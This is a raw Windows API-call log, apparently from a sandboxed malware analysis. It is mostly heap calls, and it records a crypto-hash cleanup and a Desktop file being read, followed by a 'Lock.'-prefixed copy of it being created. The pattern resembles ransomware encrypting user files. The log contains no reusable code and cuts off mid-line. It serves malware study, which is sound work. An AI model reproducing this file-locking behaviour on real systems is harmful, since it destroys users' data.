[0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0145.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0145.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0145.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0145.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0145.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0145.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0145.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0145.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0145.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0145.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0145.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0145.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0145.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0145.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0145.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0145.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0145.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0145.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0145.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0145.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0145.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0145.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0145.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0145.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0145.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0145.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0145.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0145.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0145.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0145.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0145.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0145.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0145.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0145.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0145.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0145.710] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0145.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0145.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0145.710] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0145.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0145.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0145.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0145.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0145.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0145.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0145.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0145.711] CryptDestroyHash (hHash=0xa87250) returned 1 [0145.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Dh6CM5.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\dh6cm5.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0145.713] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.713] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0145.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0145.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0145.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0145.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0145.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0145.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0145.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0145.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0145.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0145.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0145.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0145.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0145.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0145.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0145.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0145.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0145.714] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0145.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0145.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0145.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0145.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0145.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0145.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0145.716] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.Dh6CM5.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.dh6cm5.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0145.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0145.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0145.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0145.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0145.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0145.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0145.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0145.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0145.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0145.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0145.798] TranslateMessage (lpMsg=0x8cf708) returned 0 [0145.798] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0145.798] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0145.798] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0145.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0145.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0145.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0145.799] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0145.799] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0145.799] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0145.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0145.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0145.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 